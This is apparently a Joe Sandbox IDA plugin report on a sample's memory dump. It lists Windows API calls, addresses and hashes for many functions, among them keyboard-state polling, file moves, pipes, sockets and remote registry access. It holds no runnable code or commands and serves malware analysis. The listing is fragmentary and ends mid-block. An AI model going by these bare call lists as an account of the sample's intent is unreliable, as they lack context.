                                                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00E219E1
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00E219FE
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00E21A23
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00E21A3D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                    • String ID: $'
                                                                                                                                                                                                                                                                                                    • API String ID: 4210589936-3149202309
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E430BB
                                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E430C3
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E43151
                                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E4317C
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E431D1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E8D7CD,?), ref: 00E8E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E8D7CD,?), ref: 00E8E72D
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00E8D7F0
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E8D82A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8D8B0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8D8C6
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00E8D90C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: e016cfc38842c48e0dbf416db180e64dbfe1eb9d90d72ad887b134c20c58ff78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f3da1b8a687c3551019ef6bef8520aab5e93588a64f7f034b7e480027269311
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e016cfc38842c48e0dbf416db180e64dbfe1eb9d90d72ad887b134c20c58ff78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F14134719452189EDF16FBA4DD85ADE77F8AF08380F1014EAA50DFB191EA34A788CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00E94310
                                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E94367
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00E94390
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E9439A
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E943AB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2256411358-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9318e3966be623d4779dd7646f16eafa5e510adf592bfe9ebad77f2166532d09
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ffcd2a20478f28dc9ca3ac5f064b644fbb297bdc4ae2e1aa7972b8c27b32ce1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9318e3966be623d4779dd7646f16eafa5e510adf592bfe9ebad77f2166532d09
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B31A4F0504346EEEF35CB75DC49FB63BA8AB4030CF04566DD562B21E0E7A4998ACB21
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EB38B8
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB38EB
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB3920
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EB3952
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EB397C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB398D
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB39A7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 61d1a129c1fa34cf923ed6f7e447612ed6e0f92a1fe29c833a5b69bc19f85bb6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 08fe4ce3c6672495d32de108809e95cc1c5f213da7c18e57d8d70d8e24156b55
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61d1a129c1fa34cf923ed6f7e447612ed6e0f92a1fe29c833a5b69bc19f85bb6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48315934604255AFDB25CF69DC86FA637E0FBC6714F1422A4F544AB2B5CBB0A948CB01
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E880D0
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E880F6
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E880F9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00E88117
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00E88120
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00E88145
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00E88153
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 22b9e20ff9a307209db5754afcf3d858656dd46a80214b103858035cb349fa4a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c9be250d5dce1417b67a160d740accfedcf0a5a8b68c8cc20412d0b7ac43d30
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22b9e20ff9a307209db5754afcf3d858656dd46a80214b103858035cb349fa4a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C219772605219AF9F10EFA9DC88CBB73ACEB093647448525FD19EB290DE70DC468760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E881A9
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E881CF
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E881D2
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00E881F3
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00E881FC
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00E88216
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00E88224
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d0ac4d46d2a12fd6d9ee27b0895bcc7f0a5f101426b6420ef13f25deceec295c
                                                                                                                                                                                                                                                                                                    • Instruction ID: f3d6e504ff80aac0746c611e600071f965b3135a84b988e8e8aa0857593bdf78
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ac4d46d2a12fd6d9ee27b0895bcc7f0a5f101426b6420ef13f25deceec295c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021A431605104BF9B14EBA9EC88DAA77ECEB093647408125FD19EB2A0EF70EC41CB64
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00E90E99
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E90ED5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33b1607d5d4481b49d1e4537db23e27832457d55c3b8d98f11370b032ebd1db0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 053c0f1c37912c992ac510bb2b5c403708ade666bcefae8003296f5bba046f73
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b1607d5d4481b49d1e4537db23e27832457d55c3b8d98f11370b032ebd1db0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2215E7160430AAFDF308F69DC08A9A77E8AF54764F604A69FCA5F72D0E7709940CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00E90F6D
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E90FA8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    • Opcode ID: d8dea124e0c95b2687850e7b7b763fd70dcfa586d0e92e3f0d8f00d44f7a7228
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6b92c48ab93361fa5ad59711ac1fa9d7cab6f2e43a7f3f117b641ecf73120607
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8dea124e0c95b2687850e7b7b763fd70dcfa586d0e92e3f0d8f00d44f7a7228
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F217A7160434AAFDF208F698C04A9A77E8BF55728F601B59F8A1F32E0E7719984DB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E278B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: GetStockObject.GDI32(00000011), ref: 00E278C5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E278CF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EB4BB0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EB4BBD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EB4BC8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EB4BD7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EB4BE3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                                                                    • String ID: j`
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E8E328
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00E8E32F
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E8E345
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00E8E34C
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E8E390
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00E8E36D
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00E91322
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00E91334
                                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00E91342
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E91350
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E9135F
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E9136F
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00E91376
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EA281D
                                                                                                                                                                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EA283E
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA284F
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00EA2938
                                                                                                                                                                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00EA28E9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8433E: _strlen.LIBCMT ref: 00E84348
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E9F669), ref: 00EA3C9D
                                                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00EA2992
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00E5042A
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E50446
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00E5045D
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5047B
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00E50492
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E504B0
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E48649,00E48649,?,?,?,00E567C2,00000001,00000001,00000000), ref: 00E565CB
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E567C2,00000001,00000001,00000000,?,?,?), ref: 00E56651
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E5674B
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E56758
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E56761
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E56786
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC72A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EAC785
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAC7CA
                                                                                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EAC7F9
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EAC853
